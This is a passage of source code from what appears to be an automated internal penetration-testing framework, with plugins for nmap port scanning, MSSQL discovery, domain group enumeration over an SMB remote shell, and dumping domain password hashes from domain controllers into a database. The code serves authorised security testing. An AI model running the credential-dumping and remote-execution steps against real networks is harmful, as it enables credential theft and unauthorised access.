        spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", ( task_id, False, True, base64.b64encode(final_output), ))
        spCursor.close()
    #else:
        #params.log("nothing to check")
    #    continue
167 |
--------------------------------------------------------------------------------
/plugins/domain_enumeration/enumerate_users.py:
--------------------------------------------------------------------------------
1 | import time
2 | import asyncproc
3 | import os
4 | import base64
5 | from msf import exploit
6 |
def CountDomainGroupsToExpand(params):
    """Return the first column of the last row from countdomaingroupstoexpand, or 0 when no row comes back."""
    cur = params.db.cursor()
    cur.execute("select * from countdomaingroupstoexpand(%s)", (params.footprint_id, ))
    rows = list(cur.fetchall())
    cur.close()

    if not rows:
        return 0
    return rows[-1][0]
17 |
def GetDomainGroupToExpand(params):
    """Return the first row from getdomaingrouptoexpand for this footprint, or None when there is none."""
    cur = params.db.cursor()
    cur.execute("select * from getdomaingrouptoexpand(%s)", (params.footprint_id, ))
    next_group = cur.fetchone()
    cur.close()
    return next_group
27 |
def AddTaskListItem(params, domain_group_id):
    """Call addTaskListItem for task description 26 and return the value it yields."""
    cur = params.db.cursor()
    cur.execute("select addTaskListItem(%s, 26, %s, true, false)", (params.footprint_id, domain_group_id, ))
    first_row = cur.fetchone()
    new_task_id = first_row[0]
    cur.close()
    return new_task_id
34 |
def GetProcess(params, domain, username, password, host, map_id):
    """Start ./software/adsmbexec.py for the given account and host.

    Polls the child for up to 60 seconds. Returns the process handle, or
    None when one of the four error messages handled below was seen. When
    any failure message was seen, the credential mapping ``map_id`` is
    flagged with dgu_failed = true.

    NOTE(review): the password is passed in the child's argv, where other
    local users can read it from the process list while the child runs.
    NOTE(review): on the 60-second limit the handle is still returned even
    though no "windows" chunk was seen; gotShell is set but never read.
    """
    proc = None
    #try:
    if True:
        # Started from an argument list, so no shell parses the values.
        proc = asyncproc.Process(["./software/adsmbexec.py", "{}/{}:{}@{}".format(domain, username, password, host)])
        runWithDifferentUser = False
        gotShell = False
        startTime = time.time()
        while True:
            poll = proc.wait(os.WNOHANG)
            out = proc.read()
            time.sleep(0.25)

            if time.time() - startTime >= 60:
                #print "too much time has passed. quitting"
                #log = log + "too much time has passed. quitting" + "\r\n"
                #params.log("too much time has passed. quitting")

                break

            if out != "":
                print out

                if out.upper().find("Windows".upper()) > -1:
                    gotShell = True
                    break
                # The next four messages drop the handle and flag the mapping.
                elif out.upper().find("STATUS_SHARING_VIOLATION".upper()) > -1:
                    proc = None
                    runWithDifferentUser = True
                    break
                elif out.upper().find("SMB SessionError".upper()) > -1:
                    proc = None
                    runWithDifferentUser = True
                    break
                elif out.upper().find("rpc_x_bad_stub_data".upper()) > -1:
                    proc = None
                    runWithDifferentUser = True
                    break
                elif out.upper().find("Unexpected answer from server".upper()) > -1:
                    proc = None
                    runWithDifferentUser = True
                    break
                # These two only set the flag; polling continues.
                elif out.upper().find("The target principal name is incorrect".upper()) > -1:
                    runWithDifferentUser = True
                    # TODO update this host, set psexec_failed = true
                elif out.upper().find("'dsquery' is not recognized as an internal or external command".upper()) > -1:
                    runWithDifferentUser = True
        if runWithDifferentUser:
            cursor = params.db.cursor()
            cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (map_id, ))
            cursor.close()

    return proc
88 |
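def runCmd(proc, cmd):
    """Send *cmd* to the interactive process and return the output it produced.

    Writes the command followed by a newline, then polls ``proc`` every
    0.25 s until a chunk containing "windows" (compared case-insensitively)
    arrives; this code treats that chunk as the end of the output.

    Returns the concatenated output, or "" when no such chunk arrived within
    120 seconds.
    """
    proc.write(cmd + "\n")
    time.sleep(0.5)
    chunks = []

    startTime = time.time()
    while True:
        proc.wait(os.WNOHANG)  # non-blocking poll; the status is not used
        out = proc.read()
        time.sleep(0.25)

        if time.time() - startTime >= 120:
            print("too much time has passed. quitting")
            return ""

        if out != "":
            # Each chunk is appended once. The earlier `result += result + out`
            # re-added everything read so far whenever a new chunk arrived.
            chunks.append(out)
            if "WINDOWS" in out.upper():
                break
    return "".join(chunks)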
110 |
111 |
def AddDomainUserToGroup(params, domain_id, user, group_id):
    """Record *user* as a member of *group_id* by calling addDomainUserToGroup with bound parameters."""
    cur = params.db.cursor()
    bound_values = (params.footprint_id, domain_id, user, group_id, )
    cur.execute("select addDomainUserToGroup(%s, %s, %s, %s)", bound_values)
    cur.close()
116 |
117 |
def run(params):
    """Record the members of pending domain groups for the current footprint.

    While groups remain, fewer than five minutes have passed and no
    "timeout" marker was set, this takes the next group, registers a task
    (AddTaskListItem), runs a dsquery/dsget pipeline through the process
    from GetProcess and stores each returned account via
    AddDomainUserToGroup.

    As used below, group_info holds: [0] domain id, [1] host, [2] domain,
    [3] username, [4] password, [5] credential-map id, [6] group name,
    [7] group id.
    """
    if CountDomainGroupsToExpand(params) > 0:
        starttime = time.time()

        group_info = GetDomainGroupToExpand(params)
        # NOTE(review): this prints the whole row, including the password in
        # group_info[4], to stdout.
        print group_info
        out = ""
        proc = GetProcess(params, group_info[2], group_info[3], group_info[4], group_info[1], group_info[5])
        if proc != None:
            while CountDomainGroupsToExpand(params) > 0 and (time.time() - starttime) < 60 * 5 and out != "timeout":
                group_info = GetDomainGroupToExpand(params)
                if group_info == None:
                    print "nothing left to do, so quitting"
                    #runCmd(proc, "exit")

                    break
                else:
                    task_id = AddTaskListItem(params, group_info[7])
                    task_output = ""

                    #cmd = """cmd /C "dsquery group -name "{0}" | dsget group -members" """.format(group_info[6])
                    # NOTE(review): the group name is placed inside the quoted
                    # command without escaping; a name containing a double
                    # quote or a cmd metacharacter changes the command that
                    # runs - TODO escape or reject such names.
                    cmd = """cmd /C "dsquery group -name "{0}" | dsget group -members | dsget user -samid" """.format(group_info[6])
                    print cmd
                    out = runCmd(proc, cmd)
                    print out
                    task_output = "{}\n\n{}".format(cmd, out)

                    for l in out.split("\n"):
                        #print "DEBUG ::: [{}]".format(l)
                        if l.find("'dsquery' is not recognized as an internal or external command") != -1:
                            # "timeout" doubles as the marker for a failed run.
                            out = "timeout"
                        else:
                            # Drop the last character of the line.
                            l = l[:-1]
                            #print "[{}] [{}]".format(l, l[:2])
                            # NOTE(review): as shown, a two-character slice is
                            # compared with a one-character string, which only
                            # matches when the whole line is a single space;
                            # confirm the literal against the upstream file.
                            if l[:2] == " ":
                                if l.strip() != "samid":
                                    #print "add user [{}] to group [{}][{}]".format(l.strip(), group_info[0], group_info[7])
                                    AddDomainUserToGroup(params, group_info[0], l.strip(), group_info[7])
                    #        if l[2:] == "  ":
                    #            if l not in [ "", "C:\Windows\system32", "timeou" ] and l.find("CN=Users") != -1:
                    #                user = l.split(",")[0].split("=")[1]
                    #
                    #                add_user = True
                    #                users_blacklist = [ "SystemMailbox", "DiscoverySearchMailbox", "FederatedEmail" ]
                    #                for u in users_blacklist:
                    #                    if user.find(u) > -1:
                    #                        add_user = False
                    #                        break
                    #
                    #                if add_user:
                    #                    AddDomainUserToGroup(params, group_info[0], user[:45], group_info[7])

                    if out == "timeout":
                        print "DEBUG ::: run as different user"
                        # Flag the credential mapping and store the task
                        # status with the third argument False.
                        cursor = params.db.cursor()
                        cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (group_info[5], ))
                        cursor.close()

                        spCursor = params.db.cursor()
                        spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", ( task_id, False, False, base64.b64encode(task_output), ))
                        spCursor.close()

                        #spCursor = params.db.cursor()
                        #spCursor.execute("update domain_groups set users_gathered = true where id = %s", (group_info[7], ))
                        #spCursor.close()
                    else:

                        # Mark the group as processed and store the task
                        # status with the third argument True.
                        spCursor = params.db.cursor()
                        spCursor.execute("update domain_groups set users_gathered = true where id = %s", (group_info[7], ))
                        spCursor.close()

                        spCursor = params.db.cursor()
                        spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", ( task_id, False, True, base64.b64encode(task_output), ))
                        spCursor.close()

                    time.sleep(0.5)


            time.sleep(0.5)
            proc.write("exit\n")
            time.sleep(1)
199 |
--------------------------------------------------------------------------------
/plugins/domain_enumeration/extract_domain_hashes.py:
--------------------------------------------------------------------------------
1 | import random
2 | import time
3 | import string
4 | from msf import exploit
5 | import os
6 | import base64
7 |
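def run(params):
    """Run ./software/adsecretsdump.py for one domain and store the parsed hashes.

    Selects one (domain id, host IP, domain, username, cleartext password,
    credential-map id) row for the current footprint, registers task
    description 21, runs the helper with its stdout redirected to a file
    under temp/, stores every parsed ``domain\\user`` entry through
    addDomainCreds, then updates the task status, sets hashes_extracted and
    calls executetriggers.

    The helper is started from an argument list. The values that come from
    the database (domain, username, password, host) were previously
    formatted into a shell command line, where only the password was
    escaped.
    """
    import subprocess  # local import; the file's import block is not changed

    # NOTE(review): the last condition excludes one hard-coded address, which
    # looks like a leftover from a specific environment - confirm and remove.
    sql = """
        select
        d.id,
        hd.ip_address,
        dc.domain, dc.username, dc.cleartext_password,
        m.id
        from
        host_data hd
        join domains d on upper(d.domain_name) = upper(hd.domain)
        join domain_credentials_map m on m.host_data_id = hd.id
        join domain_credentials dc on dc.id = m.domain_credentials_id
        where
        hd.footprint_id = %s and
        d.footprint_id = dc.footprint_id and
        d.footprint_id = hd.footprint_id and
        d.footprint_id = m.footprint_id and
        hd.is_dc = true and
        m.valid = true and
        d.hashes_extracted = false and
        m.psexec_failed = false and
        d.id not in (select item_identifier from task_list where task_descriptions_id = 21 and footprint_id = %s and in_progress = true) and
        hd.ip_address != '10.100.3.22'
        """

    cursor = params.db.cursor()
    cursor.execute(sql, (params.footprint_id, params.footprint_id, ))
    row = cursor.fetchone()
    cursor.close()

    if row is None:
        return

    cursor = params.db.cursor()
    cursor.execute("select addtasklistitem(%s, 21, %s, true, false)", (params.footprint_id, row[0], ))
    task_id = cursor.fetchone()[0]
    cursor.close()

    temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
    out_path = "temp/" + temp_file_name

    # Display form only, kept identical to what was logged before (password
    # backslash-delimited). It is never handed to a shell.
    # NOTE(review): this puts the cleartext password into the task log and
    # into the stored task output below.
    delimited_pwd = "".join("\\" + c for c in row[4])
    cmd = "./software/adsecretsdump.py {}/{}:{}@{} > temp/{}".format(row[2], row[3], delimited_pwd, row[1], temp_file_name)
    params.log(cmd)

    argv = ["./software/adsecretsdump.py", "{}/{}:{}@{}".format(row[2], row[3], row[4], row[1])]
    with open(out_path, "w") as sink:
        try:
            subprocess.call(argv, stdout=sink)
        except OSError as err:
            # A helper that cannot be started leaves an empty output file,
            # as a failed shell command did before.
            params.log("could not start {}: {}".format(argv[0], err))

    with open(out_path) as dumped:
        log = dumped.read()

    for i in log.split("\n"):
        #if i[-3:] == ":::" and i.lower().find(row[2].lower()) == 0 and i.find("$") == -1:
        if i[-3:] == ":::" and i.find("$") == -1:
            user = i.split("\\")[1].split(":")[0]
            lm_hash = i.split(":")[2]
            nt_hash = i.split(":")[3]
            # NOTE(review): this prints the hashes to stdout.
            print("[{}]\\[{}] - [{}:{}]".format(row[2], user, lm_hash, nt_hash))
            cursor = params.db.cursor()
            cursor.execute("select addDomainCreds(%s, 0, %s, %s, '', %s, %s)", (params.footprint_id, row[2], user, lm_hash, nt_hash, ))
            cursor.close()

    spCursor = params.db.cursor()
    spCursor.execute("select updatetaskstatus(%s, %s, %s, %s::text)", ( task_id, False, True, base64.b64encode("{}\n\n{}".format(cmd, log)), ))
    spCursor.close()

    cursor = params.db.cursor()
    cursor.execute("update domains set hashes_extracted = true where id = %s", (row[0], ))
    cursor.close()

    cursor = params.db.cursor()
    cursor.execute("select executetriggers(%s, %s, 11, '');", (params.footprint_id, row[0], ))
    cursor.close()

    #TODO: create and call a trigger called "Domain hashes extracted"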
83 |
--------------------------------------------------------------------------------
/plugins/footprinting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/footprinting/__init__.py
--------------------------------------------------------------------------------
/plugins/footprinting/host_dns_lookup.py:
--------------------------------------------------------------------------------
1 | import os
2 |
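def run(params):
    """Look up the name nmap reports for one stored host and save it via addHost.

    Reads the host's ip_address from host_data (row id ``params.item_identifier``),
    runs an ``nmap -sL`` pipeline on it and, when the pipeline prints
    anything, stores the result. Returns without scanning when the host row
    does not exist.
    """
    # NOTE(review): the address is formatted into a shell pipeline below; it
    # presumably only ever holds an IP address - validate it before use.
    cmd = r'nmap {0} -sL --excludefile temp/exclude_list | grep "Nmap scan report" | grep \( | cut -d \ -f 5'
    cursor = params.db.cursor()
    cursor.execute("select ip_address from host_data where id = %s", (params.item_identifier, ))
    row = cursor.fetchone()
    cursor.close()

    # The template is logged, not the formatted command.
    params.log(cmd)

    if row is None:
        # No such host row; indexing it used to raise TypeError.
        return

    pipe = os.popen(cmd.format(row[0]))
    host_name = pipe.read()
    pipe.close()

    if host_name != "":
        cursor = params.db.cursor()
        # NOTE(review): other plugins use "select addHost(...)" with four
        # arguments; this three-argument "call" form looks like a leftover -
        # confirm against the database schema.
        cursor.execute("call addHost(%s, %s, %s)", (params.footprint_id, row[0], host_name, ))
        cursor.close()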
18 |
--------------------------------------------------------------------------------
/plugins/footprinting/net_range_dns_lookup.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
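def run(params):
    """List-scan one stored network range with nmap and save every host that has a name.

    Reads net_range from net_ranges (row id ``params.item_identifier``), runs
    ``nmap -sL`` with grepable output written under temp/, calls addHost for
    each "Host:" line whose parenthesised name is non-empty, and finally logs
    the whole output file.
    """
    cursor = params.db.cursor()
    cursor.execute("select net_range from net_ranges where id = %s", (params.item_identifier, ))
    ip_address = cursor.fetchone()[0]
    cursor.close()

    temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
    result_path = 'temp/' + temp_file_name

    # NOTE(review): net_range and params.nmapTiming are formatted into a
    # shell command line; validate both before they reach this point.
    cmd = "nmap {0} --excludefile temp/exclude_list -sL -oG temp/{1} -Pn -vv -T {2}".format(ip_address, temp_file_name, params.nmapTiming)
    params.log(cmd)
    params.log("")
    # close() waits for nmap to exit; the original relied on the discarded
    # popen object being collected to get the same effect.
    os.popen(cmd).close()

    # The file handle was previously never closed.
    with open(result_path) as results:
        for line in results:
            if line[:5] == "Host:":
                host = line.split(" ")[1]
                hostname = line.split("(")[1].split(")")[0]
                if hostname != "":
                    cursor = params.db.cursor()
                    #cursor.execute("call addHost(%s, %s, %s, 0)", (params.footprint_id, host, hostname, ))
                    cursor.execute("select addHost(%s, %s::varchar, %s::varchar, false)", (params.footprint_id, host, hostname, ))
                    cursor.close()

    # Read the file directly instead of starting a shell for `cat`.
    with open(result_path) as results:
        params.log(results.read())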
29 |
--------------------------------------------------------------------------------
/plugins/footprinting/portscan_host.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
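def run(params):
    """Port-scan one stored host with nmap and record every open port via addPort.

    Reads ip_address from host_data (row id ``params.item_identifier``) and
    the port list from ports_to_scan (type_id = 2), runs nmap with grepable
    output written under temp/, logs that output, and calls addPort for each
    port whose state is "open".
    """
    cursor = params.db.cursor()
    cursor.execute("select ip_address from host_data where id = %s", (params.item_identifier, ))
    ip_address = cursor.fetchone()[0]
    cursor.close()

    temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
    result_path = 'temp/' + temp_file_name

    cursor = params.db.cursor()
    cursor.execute("select port_number from ports_to_scan where type_id = 2")
    ports = ",".join(str(row[0]) for row in cursor.fetchall())
    cursor.close()

    # NOTE(review): the address is formatted into a shell command line;
    # validate it before it reaches this point.
    # close() waits for nmap to exit; the original relied on the discarded
    # popen object being collected to get the same effect.
    os.popen("nmap {0} --excludefile temp/exclude_list -n -p {1} -oG temp/{2} -Pn -vv".format(ip_address, ports, temp_file_name)).close()

    # Read the file directly instead of starting a shell for `cat`.
    with open(result_path) as results:
        params.log(results.read())

    # The file handle was previously never closed.
    with open(result_path) as results:
        for line in results:
            if line[:1] == "#":
                continue

            # Only lines without "Status" are parsed for ports.
            if line.find("Status") == -1:
                items = line[line.find("Ports")+7:]
                for item in items.split(", "):
                    data = item.split("/")
                    # Entries without a "/" separator carry no state; they
                    # used to raise IndexError.
                    if len(data) < 2:
                        continue
                    port = data[0]
                    status = data[1]
                    if status == "open":
                        cursor = params.db.cursor()
                        # NOTE(review): "call" differs from the "select" form
                        # used for other stored functions - confirm against
                        # the database schema.
                        cursor.execute("call addPort(%s, %s, %s)", (params.footprint_id, params.item_identifier, port, ))
                        cursor.close()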
45 |
--------------------------------------------------------------------------------
/plugins/footprinting/portscan_net_range.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
5 | #TODO: write plugin to do dns queries on the ranges as well
6 |
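def run(params):
    """Scan a stored network range with nmap and record hosts with open ports.

    The range is read from ``net_ranges`` by ``params.item_identifier`` and the
    port list from ``ports_to_scan`` (``type_id = 2``).  For every port that
    nmap's grepable output marks "open" the host is added with ``addHost``,
    its id is looked up in ``host_data`` and the port is stored with
    ``addPort``.  The nmap command and the output file are logged.
    """
    import subprocess  # local import: the file header only brings in os/random/string

    cursor = params.db.cursor()
    cursor.execute("select net_range from net_ranges where id = %s", (params.item_identifier, ))
    ip_address = cursor.fetchone()[0]
    cursor.close()

    temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
    output_path = "temp/" + temp_file_name

    cursor = params.db.cursor()
    cursor.execute("select port_number from ports_to_scan where type_id = 2")
    ports = ",".join(str(row[0]) for row in cursor.fetchall())
    cursor.close()

    # Database values are passed as argv entries, never through a shell, and a
    # target shaped like an option is refused.
    targets = "{0}".format(ip_address).split()
    if any(target.startswith("-") for target in targets):
        raise ValueError("scan target looks like a command-line option: {0!r}".format(ip_address))
    argv = ["nmap"] + targets + ["--excludefile", "temp/exclude_list", "-n", "-p", ports, "-oG", output_path, "-Pn", "-vv", "-T", "{0}".format(params.nmapTiming)]
    params.log(" ".join(argv))
    params.log("")
    with open(os.devnull, "w") as devnull:
        # call() returns only after nmap exits, so the output file is complete below
        subprocess.call(argv, stdout=devnull)

    with open(output_path) as handle:
        lines = handle.readlines()

    for line in lines:
        # comment lines and "Status" lines carry no port list
        if line[:1] == "#" or line.find("Status") != -1:
            continue
        rest = line[6:]  # text after the leading "Host: "
        host = rest[:rest.find(" ")]
        for item in line[line.find("Ports") + 7:].split(", "):
            fields = item.split("/")
            if len(fields) < 2 or fields[1] != "open":
                continue
            port = fields[0]

            cursor = params.db.cursor()
            cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, host, ))
            cursor.close()

            cursor = params.db.cursor()
            cursor.execute("select id from host_data where ip_address = %s and footprint_id = %s", (host, params.footprint_id, ))
            host_id = cursor.fetchone()[0]
            cursor.close()

            cursor = params.db.cursor()
            cursor.execute("select addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
            cursor.close()

    params.log("".join(lines))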
65 |
--------------------------------------------------------------------------------
/plugins/footprinting/portscan_scoped_host.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
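def run(params):
    """Scan one in-scope host with nmap and record its open ports.

    The target is read from ``scope`` by ``params.item_identifier`` and the
    port list from ``ports_to_scan`` (``type_id = 2``).  The host is added with
    ``addHost`` the first time an open port is seen; every open port is then
    stored with ``addPort`` against that host id.
    """
    import subprocess  # local import: the file header only brings in os/random/string

    cursor = params.db.cursor()
    cursor.execute("select item_value from scope where id = %s", (params.item_identifier, ))
    ip_address = cursor.fetchone()[0]
    cursor.close()

    temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
    output_path = "temp/" + temp_file_name

    cursor = params.db.cursor()
    cursor.execute("select port_number from ports_to_scan where type_id = 2")
    ports = ",".join(str(row[0]) for row in cursor.fetchall())
    cursor.close()

    # Scope entries are passed as argv entries, never through a shell, and a
    # target shaped like an option is refused.
    targets = "{0}".format(ip_address).split()
    if any(target.startswith("-") for target in targets):
        raise ValueError("scan target looks like a command-line option: {0!r}".format(ip_address))
    argv = ["nmap"] + targets + ["--excludefile", "temp/exclude_list", "-n", "-p", ports, "-oG", output_path, "-Pn", "-vv", "-T", "{0}".format(params.nmapTiming)]
    with open(os.devnull, "w") as devnull:
        # call() returns only after nmap exits, so the output file is complete below
        subprocess.call(argv, stdout=devnull)
    params.log(" ".join(argv))
    params.log("")

    with open(output_path) as handle:
        lines = handle.readlines()
    params.log("".join(lines))

    host_added = False
    host_id = 0
    for line in lines:
        # comment lines and "Status" lines carry no port list
        if line[:1] == "#" or line.find("Status") != -1:
            continue
        rest = line[6:]  # text after the leading "Host: "
        host = rest[:rest.find(" ")]
        for item in line[line.find("Ports") + 7:].split(", "):
            fields = item.split("/")
            if len(fields) < 2 or fields[1] != "open":
                continue

            if not host_added:
                # register the host once, then reuse its id for every port
                cursor = params.db.cursor()
                cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, host, ))
                cursor.close()

                cursor = params.db.cursor()
                cursor.execute("select id from host_data where ip_address = %s and footprint_id = %s", (host, params.footprint_id, ))
                host_id = cursor.fetchone()[0]
                cursor.close()
                host_added = True

            cursor = params.db.cursor()
            cursor.execute("select addPort(%s, %s, %s)", (params.footprint_id, host_id, fields[0], ))
            cursor.close()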
63 |
--------------------------------------------------------------------------------
/plugins/footprinting/portscan_scoped_range.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
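def run(params):
    """Scan an in-scope range with nmap and record hosts with open ports.

    The range is read from ``scope`` by ``params.item_identifier`` and the port
    list from ``ports_to_scan`` (``type_id = 1``).  For every port that nmap's
    grepable output marks "open" the host is added with ``addHost``, its id is
    looked up in ``host_data`` and the port is stored with ``addPort``.  The
    output file is logged at the end.
    """
    import subprocess  # local import: the file header only brings in os/random/string

    cursor = params.db.cursor()
    cursor.execute("select item_value from scope where id = %s", (params.item_identifier, ))
    ip_address = cursor.fetchone()[0]
    cursor.close()

    temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
    output_path = "temp/" + temp_file_name

    cursor = params.db.cursor()
    cursor.execute("select port_number from ports_to_scan where type_id = 1")
    ports = ",".join(str(row[0]) for row in cursor.fetchall())
    cursor.close()

    # Scope entries are passed as argv entries, never through a shell, and a
    # target shaped like an option is refused.
    targets = "{0}".format(ip_address).split()
    if any(target.startswith("-") for target in targets):
        raise ValueError("scan target looks like a command-line option: {0!r}".format(ip_address))
    argv = ["nmap"] + targets + ["--excludefile", "temp/exclude_list", "-n", "-p", ports, "-oG", output_path, "-Pn", "-vv", "-T", "{0}".format(params.nmapTiming)]
    with open(os.devnull, "w") as devnull:
        # call() returns only after nmap exits, so the output file is complete below
        subprocess.call(argv, stdout=devnull)

    with open(output_path) as handle:
        lines = handle.readlines()

    for line in lines:
        # comment lines and "Status" lines carry no port list
        if line[:1] == "#" or line.find("Status") != -1:
            continue
        rest = line[6:]  # text after the leading "Host: "
        host = rest[:rest.find(" ")]
        for item in line[line.find("Ports") + 7:].split(", "):
            fields = item.split("/")
            if len(fields) < 2 or fields[1] != "open":
                continue

            cursor = params.db.cursor()
            cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, host, ))
            cursor.close()

            cursor = params.db.cursor()
            cursor.execute("select id from host_data where ip_address = %s and footprint_id = %s", (host, params.footprint_id, ))
            host_id = cursor.fetchone()[0]
            cursor.close()

            cursor = params.db.cursor()
            cursor.execute("select addPort(%s, %s, %s)", (params.footprint_id, host_id, fields[0], ))
            cursor.close()

    params.log("".join(lines))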
63 |
--------------------------------------------------------------------------------
/plugins/footprinting/query_mssql_discovery_service.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 | import socket
5 |
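def run(params):
    """Probe every address of a stored range for the MS SQL discovery service.

    The range is read from ``net_ranges`` by ``params.item_identifier``.  For
    each of the 256 last-octet values a UDP datagram is sent to port 1434; when
    a reply arrives, the tenth ";"-separated field is taken as the TCP port and
    the host, the port and a trigger (type 12) are written to the database.
    Addresses that do not answer, or whose reply cannot be parsed, are skipped.
    """
    cursor = params.db.cursor()
    cursor.execute("select net_range from net_ranges where id = %s", (params.item_identifier, ))
    net_range = cursor.fetchone()[0]
    cursor.close()

    params.log("Check for instances of the MS SQL Server Discovery service in {}".format(net_range))
    params.log("")

    # NOTE(review): only a literal "0/24" is stripped; a range with another
    # prefix length keeps its CIDR text and every probe below is then skipped
    prefix = net_range.replace("0/24", "")

    for octet in range(256):
        sock = None
        try:
            ip = "{}{}".format(prefix, octet)
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.settimeout(0.5)
            sock.sendto("\x02\x41\x41\x41\x41", (ip, 1434))
            val = sock.recv(4096)
            # the reply is untrusted network data: int() rejects anything that is not a number
            port = int(val.split(";")[9])
            params.log(" {}:{}".format(ip, port))

            cursor = params.db.cursor()
            cursor.execute("select addHost(%s, %s::varchar, ''::varchar, false)", (params.footprint_id, ip, ))
            cursor.close()

            cursor = params.db.cursor()
            cursor.execute("select id from host_data where ip_address = %s and footprint_id = %s", (ip, params.footprint_id, ))
            host_id = cursor.fetchone()[0]
            cursor.close()

            cursor = params.db.cursor()
            cursor.execute("select addPort(%s, %s, %s)", (params.footprint_id, host_id, port, ))
            cursor.close()

            cursor = params.db.cursor()
            cursor.execute("select id from port_data where host_data_id = %s and port_number = %s", (host_id, port, ))
            port_id = cursor.fetchone()[0]
            cursor.close()

            cursor = params.db.cursor()
            cursor.execute("select executetriggers(%s, %s, %s, %s)", (params.footprint_id, port_id, 12, str(port), ))
            cursor.close()
        except Exception:
            # best effort per address, but Ctrl-C and interpreter exit are no longer swallowed
            continue
        finally:
            # one socket per address: close it so 256 descriptors are not left open
            if sock is not None:
                sock.close()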
51 |
--------------------------------------------------------------------------------
/plugins/footprinting/scoped_range_dns_lookup.py:
--------------------------------------------------------------------------------
1 | import os
2 | import random
3 | import string
4 |
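def run(params):
    """List-scan an in-scope range with nmap and store hosts that have a name.

    The range is read from ``scope`` by ``params.item_identifier``.  nmap runs
    with ``-sL`` and grepable output; each "Host:" line whose parenthesised
    hostname is not empty is stored with ``addHost``.  The command and the
    output file are logged.
    """
    import subprocess  # local import: the file header only brings in os/random/string

    cursor = params.db.cursor()
    cursor.execute("select item_value from scope where id = %s", (params.item_identifier, ))
    ip_address = cursor.fetchone()[0]
    cursor.close()

    temp_file_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(6))
    output_path = "temp/" + temp_file_name

    # Scope entries are passed as argv entries, never through a shell, and a
    # target shaped like an option is refused.
    targets = "{0}".format(ip_address).split()
    if any(target.startswith("-") for target in targets):
        raise ValueError("scan target looks like a command-line option: {0!r}".format(ip_address))
    argv = ["nmap"] + targets + ["--excludefile", "temp/exclude_list", "-sL", "-oG", output_path, "-Pn", "-vv", "-T", "{0}".format(params.nmapTiming)]
    params.log(" ".join(argv))
    params.log("")
    with open(os.devnull, "w") as devnull:
        # call() returns only after nmap exits, so the output file is complete below
        subprocess.call(argv, stdout=devnull)

    with open(output_path) as handle:
        lines = handle.readlines()

    for line in lines:
        if line[:5] != "Host:":
            continue
        host = line.split(" ")[1]
        # the name comes from reverse DNS, so it is only ever used as a bound SQL parameter
        hostname = line.split("(")[1].split(")")[0]
        if hostname != "":
            cursor = params.db.cursor()
            cursor.execute("select addHost(%s, %s::varchar, %s::varchar, false)", (params.footprint_id, host, hostname, ))
            cursor.close()

    params.log("".join(lines))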
28 |
--------------------------------------------------------------------------------
/plugins/footprinting/screenshot_website.py:
--------------------------------------------------------------------------------
1 | import os
2 | import psycopg2
3 |
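def run(params):
    """Fetch a web page, extract its title, take a screenshot and store all three.

    Host and port are read from ``host_data``/``port_data`` by
    ``params.item_identifier``; ports 443 and 8443 are fetched over https.
    The body is fetched with curl, the screenshot is made with wkhtmltoimage
    and base64-encoded, and the result is stored with ``addWebsite``.
    """
    import subprocess  # local import: the file header only brings in os/psycopg2

    cursor = params.db.cursor()
    cursor.execute("select hd.id, hd.ip_address, pd.port_number from host_data hd join port_data pd on hd.id = pd.host_data_id where pd.id = %s", (params.item_identifier, ))
    row = cursor.fetchone()
    cursor.close()

    host = row[1]
    port = row[2]

    protocol = "http"
    if port in [443, 8443]:
        protocol = "https"

    url = "{0}://{1}:{2}/".format(protocol, host, port)

    # The host is a database value; it reaches curl inside one argv entry and
    # never through a shell.  -k (no certificate verification) is kept from
    # the original command.
    curl_argv = ["curl", "-m", "60", "-s", "-k", "--location", url]
    html = subprocess.Popen(curl_argv, stdout=subprocess.PIPE).communicate()[0]
    try:
        params.log(" ".join(curl_argv))

        # result is discarded: the call only serves to raise on a body that is not UTF-8
        html.decode('utf-8')

        # NOTE(review): the tag literals of the original title branches did not
        # survive in this listing; matching the title element case-insensitively
        # is a reconstruction - confirm against the repository file.
        title = ""
        lowered = html.lower()
        start = lowered.find("<title")
        if start > -1:
            tag_end = html.find(">", start)
            body_start = tag_end + 1 if tag_end > -1 else start
            end = lowered.find("</title>", body_start)
            title = html[body_start:end] if end > -1 else html[body_start:]
        elif html.find("<") == -1:
            # no markup at all: the whole body is used as the title
            title = html
        title = title.replace("\n", "").strip()

        params.log("the title is {0}".format(title))
        params.log("")

        filename = "temp/{0}.jpg".format(params.getRandomFileName())
        # NOTE(review): this renders a remote, untrusted page on the local
        # machine; consider running the renderer in a sandbox.
        shot_argv = ["timeout", "60", "wkhtmltoimage", "--load-error-handling", "ignore", "-q", url, filename]
        subprocess.call(shot_argv)
        params.log(" ".join(shot_argv))

        # same output as "cat file | base64"; empty when no screenshot was written
        image_b64 = subprocess.Popen(["base64", filename], stdout=subprocess.PIPE).communicate()[0]

        cursor = params.db.cursor()
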